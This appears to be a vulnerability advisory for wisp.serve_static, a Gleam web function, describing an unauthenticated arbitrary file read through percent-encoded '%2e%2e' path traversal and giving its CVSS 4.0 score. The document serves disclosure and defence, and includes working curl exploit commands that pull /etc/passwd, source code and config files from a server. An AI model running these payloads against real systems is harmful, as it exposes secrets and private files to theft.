wisp.serve_static is vulnerable to arbitrary file read via percent-encoded path traversal (%2e%2e). The directory traversal sanitization runs before percent-decoding, allowing encoded .. sequences to bypass the filter. An unauthenticated attacker can read any file readable by the application process in a single HTTP request.
In src/wisp.gleam, serve_static processes the request path in this order:
let path =
path
|> string.drop_start(string.length(prefix))
|> string.replace(each: "..", with: "") // Step 1: sanitize
|> filepath.join(directory, _)
let path = case uri.percent_decode(path) { // Step 2: decode
Ok(p) -> p
Error(_) -> path
}
Sanitization (step 1) strips literal .. but runs before percent-decoding (step 2). The encoded sequence %2e%2e passes through string.replace unchanged, then uri.percent_decode converts it to .., which the OS resolves as directory traversal when the file is read.
Any application using wisp.serve_static:
fn handle_request(req: wisp.Request) -> wisp.Response {
use <- wisp.serve_static(req, under: "/static", from: priv_directory())
wisp.not_found()
}
Exploit (requires --path-as-is to prevent client-side normalization):
# Read /etc/passwd
curl -s --path-as-is \
"http://localhost:8080/static/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
# Read project source code
curl -s --path-as-is \
"http://localhost:8080/static/%2e%2e/%2e%2e/src/app.gleam"
# Read project config
curl -s --path-as-is \
"http://localhost:8080/static/%2e%2e/%2e%2e/gleam.toml"
This is a path traversal / arbitrary file read vulnerability (CWE-22). Any application using wisp.serve_static is affected. An unauthenticated attacker can read:
priv/.env files, secret_key_base, private keys/etc/passwd,...2.2.1Exploitability
AV:NAC:LAT:NPR:NUI:NVulnerable System
VC:HVI:NVA:NSubsequent System
SC:NSI:NSA:N8.7/CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N